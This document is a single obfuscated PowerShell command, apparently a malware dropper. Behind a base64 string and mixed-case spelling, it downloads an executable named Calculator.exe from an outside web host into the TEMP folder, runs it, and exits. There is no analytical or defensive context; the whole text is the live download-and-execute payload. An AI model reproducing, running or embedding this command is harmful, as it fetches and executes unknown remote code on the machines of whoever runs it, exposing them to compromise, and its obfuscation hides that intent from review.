iex([SySTEm.tEXt.ENcoDING]::UTf8.gEtstriNg([sYStem.cONVErt]::fRoMBase64striNG('CihOZXctT2JqZWN0IHNZc1RlTS5OZVQuV0ViQ0xJZU50KS5kT1dObG9BREZpTGUoJ2h0dHA6Ly9sdnJ4ZC4zZWV3ZWIuY29tL25hbm8vQ2FsY3VsYXRvci5leGUnLCIkRU52OlRFTVBcdGVzdC5leGUiKTtTdGFydC1Qcm9jZXNzICgiJEVOdjpURU1QXHRlc3QuZXhlIikKCg==')));exit
